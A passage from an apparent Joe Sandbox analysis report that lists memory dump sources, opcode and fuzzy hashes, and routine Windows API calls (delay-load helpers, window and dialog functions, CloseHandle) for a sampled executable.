    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7d767c7ec5e59f36ad730a72fcdbc9b1867d0d9bb465928d89726d956575713d
    • Instruction ID: ebe23fa1572c9e7a87d3f0b683f7dfab9646105f05e0fd23696f19e3f9c26c90
    • Opcode Fuzzy Hash: 7d767c7ec5e59f36ad730a72fcdbc9b1867d0d9bb465928d89726d956575713d
    • Instruction Fuzzy Hash: EDB01295278102BC330823517F03E7E010FCBC4B10330813FF101F84C298A10D411073
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c5a8e3495029e7cd1c33b860c5994c364c2ec25659d92aa57affa0852278cd98
    • Instruction ID: 476ef4da0ae2be8f249841fe7de0f4b22bb118948e4bb169648ab0a857f51cfb
    • Opcode Fuzzy Hash: c5a8e3495029e7cd1c33b860c5994c364c2ec25659d92aa57affa0852278cd98
    • Instruction Fuzzy Hash: FCB01291278002BC330863652F03F7E011FC3C8B10330803FF105E90C1E8910C451173
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a85ef86db128322b6b30893199344e6ace48162dd36c6baab02e34c7a995608a
    • Instruction ID: cb9be1ef233e7ab1afe7c0da9fbd4086907df04c4b951552337089290356e21d
    • Opcode Fuzzy Hash: a85ef86db128322b6b30893199344e6ace48162dd36c6baab02e34c7a995608a
    • Instruction Fuzzy Hash: B4B01291278102FC330863652E03F7E011FC7C8B10330413FF005E51C1E8910D881173
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3bdd720d6f841164c97c09deb72d0d1c75061f374aa39283a305ed54a873898e
    • Instruction ID: 87f4c19d0cfcdeeb42e2c967415ea1e4659b282ac7d6a1726ab4ff90caebd2bf
    • Opcode Fuzzy Hash: 3bdd720d6f841164c97c09deb72d0d1c75061f374aa39283a305ed54a873898e
    • Instruction Fuzzy Hash: 44B012913A8102BC330863557F02F7E011EC3D0B10330443FF001D8441E8810D811033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 701bd4383d261ba397b553808b5cda7be404956f764a5f7ddbf6ec3c2cbf12d0
    • Instruction ID: d808ee547e01b3e6767e4f8af425e6ec06108549a7bfbbe72f033f17b25b6af4
    • Opcode Fuzzy Hash: 701bd4383d261ba397b553808b5cda7be404956f764a5f7ddbf6ec3c2cbf12d0
    • Instruction Fuzzy Hash: CAB01291368102BC33086355BE02F7E021EC3D0B10330843FF401D4441E8400C801033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9fe6f11ec019e339cd88b33303b8927e1928cc9d3957d350082e37bb9f8e1f34
    • Instruction ID: 08f1e13cecf3afe01901abf69a6222be407b68823936f3b14098bb0b297125b1
    • Opcode Fuzzy Hash: 9fe6f11ec019e339cd88b33303b8927e1928cc9d3957d350082e37bb9f8e1f34
    • Instruction Fuzzy Hash: 29B01291368102BC330863557E02F7E011EC3D0B10330443FF001D4841E8400C801033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 87f48da4f3e202ac7aa5d1e22a61781ca341d6f0f5a112b9b7bd20881f7a1a98
    • Instruction ID: cbcc13b4fd0f9cdc4d13e8c82de9081c7afb57be70dedb047f2c00f7374f59df
    • Opcode Fuzzy Hash: 87f48da4f3e202ac7aa5d1e22a61781ca341d6f0f5a112b9b7bd20881f7a1a98
    • Instruction Fuzzy Hash: 82B01291368102BC33186355BE02F7E010EC3D0B10330843FF401D9441D8400C841033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 993326289cf059bac77b50e51a1b2c1d4f9356b5f5fd0a949b4b2a692ed15090
    • Instruction ID: 1f13ac7b376ad95dc8f134b467f7fc63fd278fd4eb1fdf18a4066b0aa1c8884a
    • Opcode Fuzzy Hash: 993326289cf059bac77b50e51a1b2c1d4f9356b5f5fd0a949b4b2a692ed15090
    • Instruction Fuzzy Hash: 4EB01291368202BC335863557E02F7E010EC3D0B10330493FF401D4441D8400CC01033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CFD5A
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 490b152ba00cc9d127ef30e1b3e84164bce867013a5733b060b033ad75cc1e63
    • Instruction ID: c44c7383899d6d750acbb39d8e5273927655a78e207ce9e3221578675145b47a
    • Opcode Fuzzy Hash: 490b152ba00cc9d127ef30e1b3e84164bce867013a5733b060b033ad75cc1e63
    • Instruction Fuzzy Hash: 93B012D1268502BD330823512D02F7E020FC7C0B11330863FF103E404294400D881073
    APIs
    • DestroyWindow.USER32(?,00000000,000CE640,?,?,00000001,?,?,000CC999,000E60F0,00111CF0,00111CF0,00001000,000F30C4,00000000,?), ref: 000CA241
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: 20c5eb64b173983e55459dc8e0584b98518955052ef6f0dcdc94ebb87ee5e133
    • Instruction ID: 75d3f517bec7855f88a98b667acd199b60de03e2d10c9fb2c555484fa6030852
    • Opcode Fuzzy Hash: 20c5eb64b173983e55459dc8e0584b98518955052ef6f0dcdc94ebb87ee5e133
    • Instruction Fuzzy Hash: 27C08C31011B20CBC3360B08EA0878276E0AB04B16F00C81DA09606860C3B0A880CA40
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a159d25fc422932c2e1ac387a589f75c5051ac6f5747866398a6a698aa6f0b78
    • Instruction ID: 45dd87aea856e45f1fae814b2f31d19a778de88d2d7d4be5b345ce05f3f1e9a9
    • Opcode Fuzzy Hash: a159d25fc422932c2e1ac387a589f75c5051ac6f5747866398a6a698aa6f0b78
    • Instruction Fuzzy Hash: 4AA001A62A9183BC7A5863627E16E7E022EC6D4B61370892FF50298482A8911A456472
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a29a032472eadcddd5a8d9e28ad8651962ae5d81ae2a96206349ef84c7b462b9
    • Instruction ID: 45dd87aea856e45f1fae814b2f31d19a778de88d2d7d4be5b345ce05f3f1e9a9
    • Opcode Fuzzy Hash: a29a032472eadcddd5a8d9e28ad8651962ae5d81ae2a96206349ef84c7b462b9
    • Instruction Fuzzy Hash: 4AA001A62A9183BC7A5863627E16E7E022EC6D4B61370892FF50298482A8911A456472
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c9ae8919c798da6b1a3302e271dcce8ecf3970f03beb3afc5a65bb384b3b7132
    • Instruction ID: 45dd87aea856e45f1fae814b2f31d19a778de88d2d7d4be5b345ce05f3f1e9a9
    • Opcode Fuzzy Hash: c9ae8919c798da6b1a3302e271dcce8ecf3970f03beb3afc5a65bb384b3b7132
    • Instruction Fuzzy Hash: 4AA001A62A9183BC7A5863627E16E7E022EC6D4B61370892FF50298482A8911A456472
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 83c8634b9fb7ed389bd360b4874d531167e1ff9a7c12a38074e62930ee7033c2
    • Instruction ID: 2d50fe0ac2ddbd814d5a861284110089015832d56e95d72319fa0faaee063678
    • Opcode Fuzzy Hash: 83c8634b9fb7ed389bd360b4874d531167e1ff9a7c12a38074e62930ee7033c2
    • Instruction Fuzzy Hash: F4A012D12A40023D310427113E02E7E010EC2D0B50330402FF301D4041584008091032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6d6ebb2b5346ec7c43e84a3bde2afffd36f602c12094d412e1973a26ac316259
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 6d6ebb2b5346ec7c43e84a3bde2afffd36f602c12094d412e1973a26ac316259
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7a4e314f2807d535c7a4c7f7695fa165a7ea2623f51b623502b1c0ec83073884
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 7a4e314f2807d535c7a4c7f7695fa165a7ea2623f51b623502b1c0ec83073884
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 873b1e30218b30a8606140ef8f76d0a5b8352996116a8052d1b6c26a40d45ba7
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 873b1e30218b30a8606140ef8f76d0a5b8352996116a8052d1b6c26a40d45ba7
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0b774c9e37774a6920c9f7063a39d182cbe55a4f144dc699d651addb5eb6691e
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 0b774c9e37774a6920c9f7063a39d182cbe55a4f144dc699d651addb5eb6691e
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: b08d01abdb68be55fb287a42bb392c203bf3e1b58e612bc6f2ec19111fd76174
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: b08d01abdb68be55fb287a42bb392c203bf3e1b58e612bc6f2ec19111fd76174
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: bb1e55d8f0bf64479e2a523281cd48d472687075d7f7af681b6ed836dfde035d
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: bb1e55d8f0bf64479e2a523281cd48d472687075d7f7af681b6ed836dfde035d
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1cc674762fc082c9266d05f41729ccc291d63f3c7d432cacc3b5a8e42bcaad12
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: 1cc674762fc082c9266d05f41729ccc291d63f3c7d432cacc3b5a8e42bcaad12
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 45bb3b83ae5478eb87fd26a609e8e3dde31813d92f42044571c26f24fd6aed8a
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: 45bb3b83ae5478eb87fd26a609e8e3dde31813d92f42044571c26f24fd6aed8a
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: efeddb7eeaad85996d4018915a46f85b687c9cb9bdecb295a84ef9013826dcbc
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: efeddb7eeaad85996d4018915a46f85b687c9cb9bdecb295a84ef9013826dcbc
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 5fcae6f362c2d3dbea27c32f1d67f8fd07702c43362a7db28490085842a4e06e
    • Instruction ID: dc92b1bd22e8339b0a8290aa453cea9dabc9a4cd7027e2f5841905090e717ea5
    • Opcode Fuzzy Hash: 5fcae6f362c2d3dbea27c32f1d67f8fd07702c43362a7db28490085842a4e06e
    • Instruction Fuzzy Hash: C0A002952651477C351463517D56F7E111DC6D1B15330452FF511944515C9119451076
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7ea9eae64a9a11591b7f503652cb6affdf8e63ccf91712f3ff64311872b32c3a
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: 7ea9eae64a9a11591b7f503652cb6affdf8e63ccf91712f3ff64311872b32c3a
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    APIs
    • CloseHandle.KERNEL32(000000FF,?,?,000BA83D,?,?,?,?,?,000E37FF,000000FF), ref: 000BA89B
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: cc4ac89c1a4e5bd767a809a7fc200fde657dbbe77ce84a5c5b14bbd86cfeef5a
    • Instruction ID: 82c87013a7836c7fb7ce9dcbe7ff0395f56855f5cfda01c8993ea697dd890e99
    • Opcode Fuzzy Hash: cc4ac89c1a4e5bd767a809a7fc200fde657dbbe77ce84a5c5b14bbd86cfeef5a
    • Instruction Fuzzy Hash: 29F0E230582B058FEB308A24C4887D2B3E4AB13335F041B5FC0E243DE0EB74698E8A51
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 000CD4A1
    • EndDialog.USER32(?,00000006), ref: 000CD4B4
    • GetDlgItem.USER32(?,0000006C), ref: 000CD4D0
    • SetFocus.USER32(00000000), ref: 000CD4D7
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 000CD511
